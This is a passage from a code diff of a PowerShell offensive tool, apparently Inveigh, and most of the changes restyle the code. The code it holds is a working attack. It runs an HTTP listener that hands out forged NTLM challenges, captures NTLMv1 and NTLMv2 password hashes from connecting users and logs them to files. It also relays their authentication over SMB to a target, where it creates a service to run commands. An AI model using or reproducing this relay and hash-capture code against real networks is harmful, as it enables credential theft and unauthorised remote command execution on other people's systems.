+                $SMB_relay_execute_stream.Read($SMB_relay_execute_bytes,0,$SMB_relay_execute_bytes.Length)    
             }
             
-            if((!$SMB_relay_failed) -and ($k -eq 7))
+            if(!$SMB_relay_failed -and $k -eq 7)
             {
-                $inveigh.console_queue.add("SMB relay service $SMB_service created on $SMBRelayTarget")
-                $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $SMBRelayTarget")])
+                $inveigh.console_queue.Add("SMB relay service $SMB_service created on $SMBRelayTarget")
+                $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $SMBRelayTarget")])
             }
             elseif((!$SMB_relay_failed) -and ($k -eq 9))
             {
-                $inveigh.console_queue.add("SMB relay command likely executed on $SMBRelayTarget")
-                $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - SMB relay command likely executed on $SMBRelayTarget")])
+                $inveigh.console_queue.Add("SMB relay command likely executed on $SMBRelayTarget")
+                $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay command likely executed on $SMBRelayTarget")])
             
-                if($SMBRelayAutoDisable -eq 'y')
+                if($SMBRelayAutoDisable -eq 'Y')
                 {
                     $inveigh.SMB_relay = $false
-                    $inveigh.console_queue.add("SMB relay auto disabled due to success")
-                    $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - SMB relay auto disabled due to success")])
+                    $inveigh.console_queue.Add("SMB relay auto disabled due to success")
+                    $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay auto disabled due to success")])
                 }
+
             }
-            elseif((!$SMB_relay_failed) -and ($k -eq 11))
+            elseif(!$SMB_relay_failed -and $k -eq 11)
             {
-                $inveigh.console_queue.add("SMB relay service $SMB_service deleted on $SMBRelayTarget")
-                $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $SMBRelayTarget")])
-                }   
+                $inveigh.console_queue.Add("SMB relay service $SMB_service deleted on $SMBRelayTarget")
+                $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $SMBRelayTarget")])
+            }   
             
-            [Byte[]]$SMB_relay_execute_ReadAndRequest = (0x00,0x00,0x00,0x37,0xff,0x53,0x4d,0x42,0x2e,0x00,0x00,0x00,0x00,0x18,0x05,0x28)`
-                + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08)`
-                + $inveigh.process_ID_bytes`
-                + $SMB_user_ID`
-                + $SMB_multiplex_ID`
-                + (0x00,0x0a,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x58,0x02,0x58,0x02,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00)
+            $SMB_relay_execute_ReadAndRequest = 0x00,0x00,0x00,0x37,0xff,0x53,0x4d,0x42,0x2e,0x00,0x00,0x00,0x00,
+                                                0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+                                                0x00,0x00,0x00,0x08 +
+                                                $inveigh.process_ID_bytes +
+                                                $SMB_user_ID +
+                                                $SMB_multiplex_ID +
+                                                0x00,0x0a,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x58,
+                                                0x02,0x58,0x02,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00
             
             if($SMB_relay_failed)
             {
-                $inveigh.console_queue.add("SMB relay failed on $SMBRelayTarget")
-                $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - SMB relay failed on $SMBRelayTarget")])
+                $inveigh.console_queue.Add("SMB relay failed on $SMBRelayTarget")
+                $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay failed on $SMBRelayTarget")])
                 BREAK SMB_relay_execute_loop
             }
 
@@ -934,55 +1031,59 @@ $SMB_relay_execute_scriptblock =
         }
         
         $inveigh.SMB_relay_active_step = 0
-        
         $SMB_relay_socket.Close()
-        
     }
+
 }
 
 # HTTP/HTTPS Server ScriptBlock - HTTP/HTTPS listener
 $HTTP_scriptblock = 
 { 
-    param ($SMBRelayTarget,$SMBRelayCommand,$SMBRelayUsernames,$SMBRelayAutoDisable,$SMBRelayNetworkTimeout,$MachineAccounts,$WPADAuth)
+    param ($SMBRelayTarget,$SMBRelayCommand,$SMBRelayUsernames,$SMBRelayAutoDisable,$SMBRelayNetworkTimeout,$WPADAuth)
 
-    Function NTLMChallengeBase64
+    function NTLMChallengeBase64
     {
 
         $HTTP_timestamp = Get-Date
         $HTTP_timestamp = $HTTP_timestamp.ToFileTime()
-        $HTTP_timestamp = [BitConverter]::ToString([BitConverter]::GetBytes($HTTP_timestamp))
-        $HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
+        $HTTP_timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_timestamp))
+        $HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
 
         if($Inveigh.challenge)
         {
             $HTTP_challenge = $Inveigh.challenge
             $HTTP_challenge_bytes = $Inveigh.challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-')
-            $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
+            $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
         }
         else
         {
             $HTTP_challenge_bytes = [String](1..8 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
-            $HTTP_challenge = $HTTP_challenge_bytes -replace ' ', ''
-            $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split(" ") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
+            $HTTP_challenge = $HTTP_challenge_bytes -replace ' ',''
+            $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
         }
 
-        $inveigh.HTTP_challenge_queue.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + ',' + $HTTP_challenge) |Out-Null
+        $inveigh.HTTP_challenge_queue.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + ',' + $HTTP_challenge)  > $null
 
-        [byte[]]$HTTP_NTLM_bytes = (0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38,0x00,0x00,0x00,0x05,0x82,0x89,0xa2)`
-            + $HTTP_challenge_bytes`
-            + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00)`
-            + (0x02,0x00,0x06,0x00,0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54,0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00)`
-            + (0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24,0x00,0x68,0x00,0x6f,0x00)`
-            + (0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00)`
-            + (0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00)`
-            + $HTTP_timestamp`
-            + (0x00,0x00,0x00,0x00,0x0a,0x0a)
+        $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38,
+                           0x00,0x00,0x00,0x05,0x82,0x89,0xa2 +
+                           $HTTP_challenge_bytes +
+                           0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06,
+                           0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00,
+                           0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54,
+                           0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,
+                           0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24,
+                           0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,
+                           0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,
+                           0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,
+                           0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 +
+                           $HTTP_timestamp +
+                           0x00,0x00,0x00,0x00,0x0a,0x0a
 
         $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
         $NTLM = 'NTLM ' + $NTLM_challenge_base64
         $NTLM_challenge = $HTTP_challenge
 
-        Return $NTLM
+        return $NTLM
 
     }
     
@@ -991,8 +1092,7 @@ $HTTP_scriptblock =
         $inveigh.context = $inveigh.HTTP_listener.GetContext() 
         $inveigh.request = $inveigh.context.Request
         $inveigh.response = $inveigh.context.Response
-        $inveigh.message = ''
-        
+        $inveigh.message = ''    
         $NTLM = 'NTLM'
         
         if($inveigh.request.IsSecureConnection)
@@ -1004,7 +1104,7 @@ $HTTP_scriptblock =
             $HTTP_type = "HTTP"
         }
         
-        if (($inveigh.request.RawUrl -match '/wpad.dat') -and ($WPADAuth -eq 'Anonymous'))
+        if ($inveigh.request.RawUrl -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous')
         {
             $inveigh.response.StatusCode = 200
         }
@@ -1012,34 +1112,53 @@ $HTTP_scriptblock =
         {
             $inveigh.response.StatusCode = 401
         }
+
+        $HTTP_request_time = Get-Date -format 's'
+
+        if($HTTP_request_time -eq $HTTP_request_time_old -and $inveigh.request.RawUrl -eq $HTTP_request_raw_url_old -and $inveigh.request.RemoteEndpoint.Address -eq $HTTP_request_remote_endpoint_old)
+        {
+            $HTTP_raw_url_output = $false
+        }
+        else
+        {
+            $HTTP_raw_url_output = $true
+        }
+
+        if(!$inveigh.request.headers["Authorization"] -and $inveigh.HTTP_listener.IsListening -and $HTTP_raw_url_output)
+        {
+            $inveigh.console_queue.Add("$HTTP_request_time - $HTTP_type request for " + $inveigh.request.RawUrl + " received from " + $inveigh.request.RemoteEndpoint.Address)
+            $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$HTTP_request_time - $HTTP_type request for " + $inveigh.request.RawUrl + " received from " + $inveigh.request.RemoteEndpoint.Address)])
+        }
+
+        $HTTP_request_raw_url_old = $inveigh.request.RawUrl
+        $HTTP_request_remote_endpoint_old = $inveigh.request.RemoteEndpoint.Address
+        $HTTP_request_time_old = $HTTP_request_time
             
-        [string]$authentication_header = $inveigh.request.headers.getvalues('Authorization')
+        [String] $authentication_header = $inveigh.request.headers.getvalues('Authorization')
         
         if($authentication_header.startswith('NTLM '))
         {
             $authentication_header = $authentication_header -replace 'NTLM ',''
-            [byte[]] $HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header)
+            [Byte[]] $HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header)
             $inveigh.response.StatusCode = 401
             
             if ($HTTP_request_bytes[8] -eq 1)
             {
-                $inveigh.console_queue.add("$(Get-Date -format 's') - $HTTP_type request for " + $inveigh.request.RawUrl + " received from " + $inveigh.request.RemoteEndpoint.Address)
-                $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - $HTTP_type request for " + $inveigh.request.RawUrl + " received from " + $inveigh.request.RemoteEndpoint.Address)])
 
-                if(($inveigh.SMB_relay) -and ($inveigh.SMB_relay_active_step -eq 0) -and ($inveigh.request.RemoteEndpoint.Address -ne $SMBRelayTarget))
+                if($inveigh.SMB_relay -and $inveigh.SMB_relay_active_step -eq 0 -and $inveigh.request.RemoteEndpoint.Address -ne $SMBRelayTarget)
                 {
                     $inveigh.SMB_relay_active_step = 1
-                    $inveigh.console_queue.add("$HTTP_type to SMB relay triggered by " + $inveigh.request.RemoteEndpoint.Address + " at $(Get-Date -format 's')")
-                    $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - $HTTP_type to SMB relay triggered by " + $inveigh.request.RemoteEndpoint.Address)])
-                    $inveigh.console_queue.add("Grabbing challenge for relay from $SMBRelayTarget")
-                    $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - Grabbing challenge for relay from " + $SMBRelayTarget)])
+                    $inveigh.console_queue.Add("$HTTP_type to SMB relay triggered by " + $inveigh.request.RemoteEndpoint.Address + " at $(Get-Date -format 's')")
+                    $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay triggered by " + $inveigh.request.RemoteEndpoint.Address)])
+                    $inveigh.console_queue.Add("Grabbing challenge for relay from $SMBRelayTarget")
+                    $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Grabbing challenge for relay from " + $SMBRelayTarget)])
                     $SMB_relay_socket = New-Object System.Net.Sockets.TCPClient
-                    $SMB_relay_socket.connect($SMBRelayTarget,"445")
+                    $SMB_relay_socket.Connect($SMBRelayTarget,"445")
                     
                     if(!$SMB_relay_socket.connected)
                     {
-                        $inveigh.console_queue.add("$(Get-Date -format 's') - SMB relay target is not responding")
-                        $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - SMB relay target is not responding")])
+                        $inveigh.console_queue.Add("$(Get-Date -format 's') - SMB relay target is not responding")
+                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay target is not responding")])
                         $inveigh.SMB_relay_active_step = 0
                     }
                     
@@ -1047,7 +1166,7 @@ $HTTP_scriptblock =
                     {
                         $SMB_relay_bytes = SMBRelayChallenge $SMB_relay_socket $HTTP_request_bytes
                         $inveigh.SMB_relay_active_step = 2
-                        $SMB_relay_bytes = $SMB_relay_bytes[2..$SMB_relay_bytes.length]
+                        $SMB_relay_bytes = $SMB_relay_bytes[2..$SMB_relay_bytes.Length]
                         $SMB_user_ID = $SMB_relay_bytes[34..33]
                         $SMB_relay_NTLMSSP = [System.BitConverter]::ToString($SMB_relay_bytes)
                         $SMB_relay_NTLMSSP = $SMB_relay_NTLMSSP -replace "-",""
@@ -1060,28 +1179,29 @@ $HTTP_scriptblock =
                         $SMB_relay_NTLM_challenge = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 24)..($SMB_relay_NTLMSSP_bytes_index + 31)]
                         $SMB_relay_target_details = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 56 + $SMB_domain_length)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length + $SMB_target_length)]
                     
-                        [byte[]] $HTTP_NTLM_bytes = (0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00)`
-                            + $SMB_domain_length_offset_bytes`
-                            + (0x05,0x82,0x89,0xa2)`
-                            + $SMB_relay_NTLM_challenge`
-                            + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)`
-                            + $SMB_target_length_offset_bytes`
-                            + $SMB_relay_target_details
+                        $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00 +
+                                           $SMB_domain_length_offset_bytes +
+                                           0x05,0x82,0x89,0xa2 +
+                                           $SMB_relay_NTLM_challenge +
+                                           0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 +
+                                           $SMB_target_length_offset_bytes +
+                                           $SMB_relay_target_details
                     
                         $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
                         $NTLM = 'NTLM ' + $NTLM_challenge_base64
                         $NTLM_challenge = SMBNTLMChallenge $SMB_relay_bytes
                         $inveigh.HTTP_challenge_queue.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + ',' + $NTLM_challenge)
-                        $inveigh.console_queue.add("Received challenge $NTLM_challenge for relay from $SMBRelayTarget")
-                        $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - Received challenge $NTLM_challenge for relay from $SMBRelayTarget")])
-                        $inveigh.console_queue.add("Providing challenge $NTLM_challenge for relay to " + $inveigh.request.RemoteEndpoint.Address)
-                        $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - Providing challenge $NTLM_challenge for relay to " + $inveigh.request.RemoteEndpoint.Address)])
+                        $inveigh.console_queue.Add("Received challenge $NTLM_challenge for relay from $SMBRelayTarget")
+                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Received challenge $NTLM_challenge for relay from $SMBRelayTarget")])
+                        $inveigh.console_queue.Add("Providing challenge $NTLM_challenge for relay to " + $inveigh.request.RemoteEndpoint.Address)
+                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Providing challenge $NTLM_challenge for relay to " + $inveigh.request.RemoteEndpoint.Address)])
                         $inveigh.SMB_relay_active_step = 3
                     }
                     else
                     {
                         $NTLM = NTLMChallengeBase64
                     }
+
                 }
                 else
                 {
@@ -1089,7 +1209,6 @@ $HTTP_scriptblock =
                 }
                 
                 $inveigh.response.StatusCode = 401
-                
             }
             elseif ($HTTP_request_bytes[8] -eq 3)
             {
@@ -1098,10 +1217,9 @@ $HTTP_scriptblock =
                 $HTTP_NTLM_length = DataLength 22 $HTTP_request_bytes
                 $HTTP_NTLM_domain_length = DataLength 28 $HTTP_request_bytes
                 $HTTP_NTLM_domain_offset = DataLength 32 $HTTP_request_bytes
-                
-                [string]$NTLM_challenge = $inveigh.HTTP_challenge_queue -like $inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + '*'
+                [String] $NTLM_challenge = $inveigh.HTTP_challenge_queue -like $inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + '*'
                 $inveigh.HTTP_challenge_queue.Remove($NTLM_challenge)
-                $NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(","))+1)
+                $NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(",")) + 1)
                        
                 if($HTTP_NTLM_domain_length -eq 0)
                 {
@@ -1114,7 +1232,6 @@ $HTTP_scriptblock =
                     
                 $HTTP_NTLM_user_length = DataLength 36 $HTTP_request_bytes
                 $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_length $HTTP_NTLM_domain_length 0 $HTTP_NTLM_domain_offset $HTTP_request_bytes
-                        
                 $HTTP_NTLM_host_length = DataLength 44 $HTTP_request_bytes
                 $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_length $HTTP_NTLM_domain_length $HTTP_NTLM_user_length $HTTP_NTLM_domain_offset $HTTP_request_bytes
         
@@ -1125,23 +1242,25 @@ $HTTP_scriptblock =
                     $NTLM_response = $NTLM_response.Insert(48,':')
                     $inveigh.HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_response + ":" + $NTLM_challenge
                     
-                    if((($NTLM_challenge -ne '') -and ($NTLM_response -ne '')) -and (($MachineAccounts -eq 'y') -or (($MachineAccounts -eq 'n') -and (-not $HTTP_NTLM_user_string.EndsWith('$')))))
+                    if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
                     {    
-                        $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ")")])
-                        $inveigh.NTLMv1_file_queue.add($inveigh.HTTP_NTLM_hash)
-                        $inveigh.NTLMv1_list.add($inveigh.HTTP_NTLM_hash)
-                        $inveigh.console_queue.add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + "):`n" + $inveigh.HTTP_NTLM_hash)
+                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ")")])
+                        $inveigh.NTLMv1_file_queue.Add($inveigh.HTTP_NTLM_hash)
+                        $inveigh.NTLMv1_list.Add($inveigh.HTTP_NTLM_hash)
+                        $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + "):`n" + $inveigh.HTTP_NTLM_hash)
                         
                         if($inveigh.file_output)
                         {
-                            $inveigh.console_queue.add("$HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file)
-                        }                   
+                            $inveigh.console_queue.Add("$HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file)
+                        }
+
                     }
                     
-                    if (($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address) -and (-not $HTTP_NTLM_user_string.EndsWith('$')) -and (!$inveigh.spoofer_repeat))
+                    if($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat)
                     {
-                        $inveigh.IP_capture_list += $inveigh.request.RemoteEndpoint.Address
+                        $inveigh.IP_capture_list.Add($source_IP.IPAddressToString)
                     }
+
                 }
                 else # NTLMv2
                 {   
@@ -1150,92 +1269,104 @@ $HTTP_scriptblock =
                     $NTLM_response = $NTLM_response.Insert(32,':')
                     $inveigh.HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLM_response
                     
-                    if((($NTLM_challenge -ne '') -and ($NTLM_response -ne '')) -and (($MachineAccounts -eq 'y') -or (($MachineAccounts -eq 'n') -and (-not $HTTP_NTLM_user_string.EndsWith('$')))))
+                    if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
                     {
-                        $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.request.RemoteEndpoint.address + "(" + $HTTP_NTLM_host_string + ")")])
-                        $inveigh.NTLMv2_file_queue.add($inveigh.HTTP_NTLM_hash)
-                        $inveigh.NTLMv2_list.add($inveigh.HTTP_NTLM_hash)
-                        $inveigh.console_queue.add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from " + $inveigh.request.RemoteEndpoint.address + "(" + $HTTP_NTLM_host_string + "):`n" + $inveigh.HTTP_NTLM_hash)
+                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ")")])
+                        $inveigh.NTLMv2_file_queue.Add($inveigh.HTTP_NTLM_hash)
+                        $inveigh.NTLMv2_list.Add($inveigh.HTTP_NTLM_hash)
+                        $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + "):`n" + $inveigh.HTTP_NTLM_hash)
                         
                         if($inveigh.file_output)
                         {
-                            $inveigh.console_queue.add("$HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file)
+                            $inveigh.console_queue.Add("$HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file)
                         }
                         
                     }
                     
-                    if (($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address) -and (-not $HTTP_NTLM_user_string.EndsWith('$')) -and (!$inveigh.spoofer_repeat))
+                    if ($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat)
                     {
                         $inveigh.IP_capture_list += $inveigh.request.RemoteEndpoint.Address
                     }
+
                 }
                 
                 $inveigh.response.StatusCode = 200
                 $NTLM_challenge = ''
+                $HTTP_raw_url_output = $true
                 
-                if (($inveigh.SMB_relay) -and ($inveigh.SMB_relay_active_step -eq 3))
+                if ($inveigh.SMB_relay -and $inveigh.SMB_relay_active_step -eq 3)
                 {
-                    if((!$SMBRelayUsernames) -or ($SMBRelayUsernames -contains $HTTP_NTLM_user_string) -or ($SMBRelayUsernames -contains "$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
+
+                    if(!$SMBRelayUsernames -or $SMBRelayUsernames -contains $HTTP_NTLM_user_string -or $SMBRelayUsernames -contains "$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
                     {
-                        if(($MachineAccounts -eq 'y') -or (($MachineAccounts -eq 'n') -and (-not $HTTP_NTLM_user_string.EndsWith('$'))))
+
+                        if($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))
                         {
+
                             if($inveigh.SMBRelay_failed_list -notcontains "$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $SMBRelayTarget")
                             {
+
                                 if($NTLM_type -eq 'NTLMv2')
                                 {
-                                    $inveigh.console_queue.add("Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $SMBRelaytarget")
-                                    $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $SMBRelaytarget")])
+                                    $inveigh.console_queue.Add("Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $SMBRelaytarget")
+                                    $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $SMBRelaytarget")])
                                     $SMB_relay_response_return_bytes = SMBRelayResponse $SMB_relay_socket $HTTP_request_bytes $SMB_user_ID
-                                    $SMB_relay_response_return_bytes = $SMB_relay_response_return_bytes[1..$SMB_relay_response_return_bytes.length]
+                                    $SMB_relay_response_return_bytes = $SMB_relay_response_return_bytes[1..$SMB_relay_response_return_bytes.Length]
                     
-                                    if((!$SMB_relay_failed) -and ([System.BitConverter]::ToString($SMB_relay_response_return_bytes[9..12]) -eq ('00-00-00-00')))
+                                    if(!$SMB_relay_failed -and [System.BitConverter]::ToString($SMB_relay_response_return_bytes[9..12]) -eq '00-00-00-00')
                                     {
-                                        $inveigh.console_queue.add("$HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $SMBRelayTarget")
-                                        $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $SMBRelayTarget")])
+                                        $inveigh.console_queue.Add("$HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $SMBRelayTarget")
